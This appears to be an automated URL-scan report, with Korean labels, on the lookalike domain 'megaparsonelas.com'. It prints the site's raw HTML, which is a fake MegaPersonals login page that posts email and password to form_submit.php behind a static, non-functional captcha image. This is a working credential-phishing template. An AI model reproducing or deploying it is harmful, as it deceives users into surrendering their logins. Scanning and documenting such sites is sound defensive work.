https://megaparsonelas.com/

제출된 URL:
https://megaparsonelas.com/
보고서 완료:

링크 · 0개 결과

페이지에서 식별된 외부 링크

JavaScript 변수 · 3개 결과

페이지의 창 개체에 로드된 전역 JavaScript 변수는 함수 외부에서 선언된 변수로, 현재 범위 내에서 코드의 어느 부분에서나 액세스할 수 있습니다

이름유형
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject

콘솔 로그 메시지 · 2개 결과

웹 콘솔에 기록된 메시지

유형카테고리로그
verbosedom
URL
https://megaparsonelas.com/
텍스트
[DOM] Input elements should have autocomplete attributes (suggested: "current-password"): (More info: https://goo.gl/9p2vKq) %o
errornetwork
URL
https://megaparsonelas.com/favicon.ico
텍스트
Failed to load resource: the server responded with a status of 404 ()

HTML

페이지의 원시 HTML 본문

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MegaPersonals: Classified hookups</title>
    <meta id="viewportMetaTag" name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE">
  
         <meta name="ROBOTS" content="INDEX, FOLLOW">
         <meta name="google-site-verification" content="3gtWza60O_gLcjaD_wZPYFlnR8xo7E4OnxoJCY7cwRc">
    
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="responsive.css">
    <style>
    .logo img {
        width: 400px;
    }
    </style>
</head>
<body>
    <div class="main-body">
        <center>
            <header>
                <br>
                <br>
                <div class="logo">
                    <a href="https://megaparsonelas.com">
                        <img src="mega_file/haderpic.png" alt="">
                    </a>
                </div>
            </header>
            <br>
            <section id="post">
                <p>Is this your first time posting?</p>
                <button class="primary">Start Here</button>
            </section>
            <br>
            <div class="login-form">
                <p>Already have an account?</p>
                <form action="form_submit.php" method="POST">
                    <input type="text" name="email" class="form-control" placeholder="Email" required="">
                    <input type="password" name="password" class="form-control" placeholder="Password" required="">
                    <div class="cap-img">
                        <img src="mega_file/22222.png" alt="">
                    </div>
                    <input type="text" class="form-control" placeholder="Enter code from the picture">
                    <input type="submit" value="Submit" class="sub-btn" name="sub-btn">
                </form>
                <div class="scamed">
                    <img src="mega_file/allat.png" alt="">
                </div>
                <a href="https://megaparsonelas.com">Forgot Password</a>
                <br>
                <br>
                <div class="footer">
                    <img src="mega_file/4710.png" alt="">
                </div>
            </div>
        </center>
    </div>


</body></html>